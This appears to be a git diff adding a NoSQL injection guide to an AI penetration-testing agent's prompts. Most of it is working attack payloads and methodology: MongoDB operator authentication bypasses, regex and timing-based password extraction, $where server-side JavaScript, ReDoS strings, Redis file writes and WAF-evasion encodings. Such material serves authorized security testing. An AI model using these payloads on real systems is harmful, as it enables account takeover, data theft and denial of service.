usestrix · timlzh · Dec 3, 2025
diff --git a/strix/prompts/vulnerabilities/nosql_injection.jinja b/strix/prompts/vulnerabilities/nosql_injection.jinja
@@ -0,0 +1,284 @@
+<nosql_injection_guide>
+<title>NoSQL INJECTION</title>
+
+<critical>NoSQL injection exploits vulnerabilities in non-relational databases (MongoDB, CouchDB, Redis, Cassandra, etc.) where user input manipulates query logic, operators, or JavaScript execution contexts. Unlike SQL injection, NoSQL attacks often target JSON/BSON structures, query operators, and server-side JavaScript evaluation. Treat every user-controlled input destined for NoSQL queries as untrusted.</critical>
+
+<scope>
+- Document stores: MongoDB, CouchDB, Couchbase, Amazon DocumentDB
+- Key-value stores: Redis, DynamoDB, Memcached
+- Wide-column stores: Cassandra, HBase, ScyllaDB
+- Graph databases: Neo4j, ArangoDB, Amazon Neptune
+- Integration paths: ODMs (Mongoose, Morphia), REST APIs, GraphQL resolvers, serverless functions
+</scope>
+
+<methodology>
+1. Identify NoSQL database type from error messages, response patterns, headers, or technology fingerprinting.
+2. Determine input format: JSON body, query string, URL path, headers; note how input is parsed and merged into queries.
+3. Test operator injection: inject MongoDB operators ($ne, $gt, $regex, $where) or database-specific syntax to alter query logic.
+4. Establish extraction channel: boolean-based response diffs, timing via $where/JavaScript, regex-based character extraction, or error messages.
+5. Pivot to authentication bypass, data exfiltration, or JavaScript execution depending on database capabilities.
+</methodology>
+
+<injection_surfaces>
+- JSON body parameters: direct object/operator injection via nested objects or arrays
+- Query string: array notation (?username[$ne]=) or JSON-encoded values
+- URL path segments: document IDs, collection names in RESTful APIs
+- Headers/cookies: session data parsed as JSON, JWT claims used in queries
+- GraphQL variables: unvalidated input passed directly to resolvers
+- Aggregation pipelines: $match, $lookup, $group stages with user-controlled fields
+</injection_surfaces>
+
+<detection_channels>
+<operator_based>
+- Inject query operators to modify predicate logic: {% raw %}{"username": {"$ne": null}}{% endraw %} always matches
+- Test comparison operators: $gt, $gte, $lt, $lte, $ne, $eq, $in, $nin
+- Logical operators: $or, $and, $nor to combine conditions
+</operator_based>
+
+<boolean_based>
+- Compare responses with true/false predicates; diff status codes, body length, specific content
+- Use $regex for character-by-character extraction: {% raw %}{"password": {"$regex": "^a"}}{% endraw %}
+- Binary search on character space using regex anchors
+</boolean_based>
+
+<timing_based>
+- MongoDB $where with sleep: {% raw %}{"$where": "sleep(5000)"}{% endraw %} or function-based delays
+- Heavy regex operations causing ReDoS: {% raw %}{"field": {"$regex": "^(a+)+$"}}{% endraw %} with pathological input
+- Measure response time differences to infer query results
+</timing_based>
+
+<error_based>
+- Provoke type errors, invalid operator errors, or JavaScript runtime exceptions
+- Extract information from verbose error messages (stack traces, field names, versions)
+</error_based>
+</detection_channels>
+
+<dbms_primitives>
+<mongodb>
+- Operators for injection: $ne, $gt, $lt, $gte, $lte, $in, $nin, $or, $and, $regex, $where, $exists, $type
+- JavaScript execution: $where clause accepts JavaScript; $function in aggregations (MongoDB 4.4+)
+- Version/info: db.version(), db.serverStatus(), db.hostInfo()
+- Authentication bypass: {% raw %}{"username": {"$ne": ""}, "password": {"$ne": ""}}{% endraw %}
+- Regex extraction: {% raw %}{"password": {"$regex": "^a.*"}}{% endraw %} iterate to extract full value
+- $where JavaScript: {% raw %}{"$where": "this.username == 'admin' && this.password.match(/^a/)"}{% endraw %} 
+- Aggregation injection: $lookup to access other collections, $out to write results
+</mongodb>
+
+<couchdb>
+- View injection via map/reduce functions (JavaScript execution)
+- Mango queries: operator injection similar to MongoDB ($eq, $ne, $gt, $regex, etc.)
+- _all_docs, _find endpoints with selector manipulation
+- Design document manipulation for persistent code execution
+</couchdb>
+
+<redis>
+- Command injection via protocol manipulation in poorly sanitized inputs
+- Lua script injection: EVAL command with user-controlled scripts
+- Key enumeration: KEYS *, SCAN with patterns
+- Data exfiltration: GET, HGETALL, LRANGE, SMEMBERS
+- Config manipulation: CONFIG SET to modify runtime behavior
+- File write via RDB: CONFIG SET dir/dbfilename + SAVE (requires privileges)
+</redis>
+
+<cassandra>
+- CQL injection: similar to SQL, string concatenation in WHERE clauses
+- ALLOW FILTERING abuse for unauthorized data access
+- UDF (User Defined Functions) if enabled: Java/JavaScript code execution
+</cassandra>
+
+<neo4j>
+- Cypher injection: MATCH, WHERE, RETURN clause manipulation
+- APOC procedures: apoc.load.json, apoc.cypher.run for extended capabilities
+- Label/relationship injection to access unauthorized graph nodes
+</neo4j>
+</dbms_primitives>
+
+<authentication_bypass>
+<mongodb_operators>
+- Basic bypass: {% raw %}{"username": "admin", "password": {"$ne": ""}}{% endraw %}
+- Always true: {% raw %}{"username": {"$gt": ""}, "password": {"$gt": ""}}{% endraw %}
+- Regex wildcard: {% raw %}{"username": "admin", "password": {"$regex": ".*"}}{% endraw %}
+- $or injection: {% raw %}{"$or": [{"username": "admin"}, {"admin": true}], "password": {"$ne": ""}}{% endraw %}
+- Type coercion: {% raw %}{"username": "admin", "password": {"$type": 2}}{% endraw %} (type 2 = string)
+</mongodb_operators>
+
+<query_string_injection>
+- Array notation: ?username=admin&password[$ne]=wrongpass
+- Nested operators: ?user[username]=admin&user[password][$gt]=
+- URL-encoded JSON: ?filter=%7B%22username%22%3A%7B%22%24ne%22%3Anull%7D%7D
+</query_string_injection>
+</authentication_bypass>
+
+<data_extraction>
+<regex_extraction>
+- Character-by-character: iterate {% raw %}{"field": {"$regex": "^<known>X"}}{% endraw %} for each position
+- Binary search: use character ranges [a-m] vs [n-z] to reduce requests
+- Case sensitivity: use $options: "i" for case-insensitive matching
+- Special chars: escape regex metacharacters (. * + ? ^ $ { } [ ] \ | ( ))
+</regex_extraction>
+
+<boolean_extraction>
+- Use $regex or $where to create true/false conditions
+- Diff response length, status code, specific strings, or timing
+- Extract field names via $exists: {% raw %}{"unknownField": {"$exists": true}}{% endraw %}
+</boolean_extraction>
+
+<javascript_extraction>
+- $where with conditional: {% raw %}{"$where": "if(this.password[0]=='a'){sleep(5000)}"}{% endraw %}
+- Access Object.keys(): {% raw %}{"$where": "Object.keys(this)[0][0]=='u'"}{% endraw %} to enumerate fields
+- String operations: substring, charAt for positional extraction
+</javascript_extraction>
+
+<aggregation_based>
+- $lookup to join with other collections and leak data
+- $match with injected operators
+- $project to select fields, $group to aggregate sensitive data
+</aggregation_based>
+</data_extraction>
+
+<javascript_injection>
+<where_clause>
+- MongoDB $where executes JavaScript on the server
+- Basic: {% raw %}{"$where": "1==1"}{% endraw %} or {% raw %}{"$where": "true"}{% endraw %}
+- Sleep for timing: {% raw %}{"$where": "sleep(5000) || true"}{% endraw %}
+- Data access: {% raw %}{"$where": "this.password.length > 5"}{% endraw %}
+- External calls (if allowed): {% raw %}{"$where": "this.constructor.constructor('return fetch(...)')()"}{% endraw %}
+</where_clause>
+
+<function_operator>
+- MongoDB 4.4+ $function in aggregation: {% raw %}{"$function": {"body": "function(){...}", "args": [], "lang": "js"}}{% endraw %}
+- Server-side JavaScript must be enabled (not disabled via --noscripting)
+</function_operator>
+
+<mapreduce>
+- Inject into map/reduce functions if user input reaches these contexts
+- CouchDB views: JavaScript in map functions
+</mapreduce>
+</javascript_injection>
+
+<odm_and_framework_issues>
+<mongoose>
+- Dangerous patterns: find(req.body), findOne(req.query) without sanitization
+- $where passthrough: user input reaching $where conditions
+- Population/reference injection: manipulating $lookup-like operations
+- Schema bypass: __proto__, constructor pollution via JSON parsing
+</mongoose>
+
+<morphia_java>
+- String concatenation in filters instead of parameterized queries
+- Criteria API misuse with raw strings
+</morphia_java>
+
+<pymongo>
+- eval() usage with user input (deprecated but still dangerous)
+- find() with unsanitized dictionaries from JSON input
+- Codec manipulation affecting serialization
+</pymongo>
+</odm_and_framework_issues>
+
+<waf_and_filter_bypasses>
+<encoding_tricks>
+- URL encoding: %24ne instead of $ne
+- Double encoding: %2524ne
+- Unicode normalization: using different Unicode representations
+- JSON unicode escapes: \u0024ne for $ne
+</encoding_tricks>
+
+<operator_alternatives>
+- $not instead of $ne: {% raw %}{"field": {"$not": {"$eq": "value"}}}{% endraw %}
+- $nin instead of $ne: {% raw %}{"field": {"$nin": ["wrong"]}}{% endraw %}
+- $expr with $eq/$ne in aggregation context
+</operator_alternatives>
+
+<structure_manipulation>
+- Nested objects vs flat: {% raw %}{"a.b": "c"}{% endraw %} vs {% raw %}{"a": {"b": "c"}}{% endraw %}
+- Array injection: ["$or", ...] in systems parsing arrays as operators
+- Prototype pollution: __proto__, constructor.prototype in JSON
+</structure_manipulation>
+
+<comment_injection>
+- MongoDB shell: // or /* */ in JavaScript contexts
+- Newline injection in string concatenation scenarios
+</comment_injection>
+</waf_and_filter_bypasses>
+
+<blind_extraction>
+<binary_search>
+- Use $regex with character ranges: ^[a-m] vs ^[n-z]
+- Reduce character space: alphanumeric, then specific ranges
+- Position tracking: ^known_prefix[a-m] for next character
+</binary_search>
+
+<timing_oracle>
+- $where with conditional sleep: {% raw %}if(condition){sleep(N)}{% endraw %}
+- ReDoS via pathological regex: ((a+)+)$ with long input
+- Heavy operations: sorting large datasets conditionally
+</timing_oracle>
+
+<response_differential>
+- Track: status codes (200/401/403/500), body length, specific strings, JSON structure
+- Normalize responses (hash/length) to reduce noise
+- Account for caching and rate limiting affecting responses
+</response_differential>
+</blind_extraction>
+
+<server_side_injection>
+<ssjs_mongodb>
+- Server-Side JavaScript (SSJS) when $where, $function, mapReduce are exposed
+- Potential for: DoS (infinite loops), data access, limited RCE depending on config
+- Check: {% raw %}db.adminCommand({getParameter: 1, javascriptEnabled: 1}){% endraw %}
+</ssjs_mongodb>
+
+<dos_attacks>
+- ReDoS: {% raw %}{"field": {"$regex": "^(a+)+$"}}{% endraw %} against long strings
+- Resource exhaustion: large $in arrays, complex aggregations
+- Infinite loops in $where if SSJS is enabled without timeouts
+</dos_attacks>
+</server_side_injection>
+
+<graphql_nosql>
+- Variables passed directly to MongoDB queries: {% raw %}query { user(filter: $input) }{% endraw %}
+- Operator injection via GraphQL variables: {% raw %}{"filter": {"password": {"$ne": ""}}}{% endraw %}
+- Batching attacks: multiple queries to enumerate data
+- Introspection combined with injection for schema-aware attacks
+</graphql_nosql>
+
+<validation>
+1. Demonstrate operator injection alters query behavior (auth bypass, extra data returned).
+2. Show boolean/timing/error oracle confirms control over query predicates.
+3. Extract verifiable data: version info, field names, partial sensitive values.
+4. Provide minimal reproducible requests with clear injection points.
+5. Document database type and version; defenses vary significantly across NoSQL systems.
+</validation>
+
+<false_positives>
+- Strong typing/schema validation rejecting operator objects
+- ODM sanitization stripping $ prefixes from keys
+- Parameterized queries where operators cannot be injected
+- WAF blocking all $ operators (verify with encoding bypasses first)
+- Application logic unrelated to database predicates causing response variations
+</false_positives>
+
+<impact>
+- Authentication and authorization bypass via manipulated query predicates
+- Mass data exfiltration through regex extraction or aggregation manipulation
+- Server-side JavaScript execution leading to DoS or limited RCE
+- Privilege escalation by modifying user roles/permissions in database
+- Denial of service via ReDoS or resource-intensive queries
+</impact>
+
+<pro_tips>
+1. Start with $ne and $gt operators—they're most commonly injectable and easy to detect.
+2. Use boolean oracles first; timing channels are noisier and slower.
+3. For MongoDB, always test both JSON body and query string injection vectors.
+4. $regex is powerful for extraction but escape special characters properly.
+5. Check if SSJS is enabled before investing time in $where payloads.
+6. Aggregation pipelines often have weaker validation than simple find() queries.
+7. GraphQL + MongoDB is a common vulnerable combination; test variable injection.
+8. Monitor for ReDoS potential—useful for both detection and responsible DoS impact assessment.
+9. ODMs don't guarantee safety; audit raw query patterns and merge operations.
+10. Different NoSQL databases have vastly different capabilities; tailor payloads to the target.
+</pro_tips>
+
+<remember>NoSQL injection succeeds where applications trust user input structure, not just values. Validate that input types match expectations, strip or reject query operators from user data, and use ODM features that enforce schemas. The absence of SQL syntax does not mean the absence of injection risk.</remember>
+</nosql_injection_guide>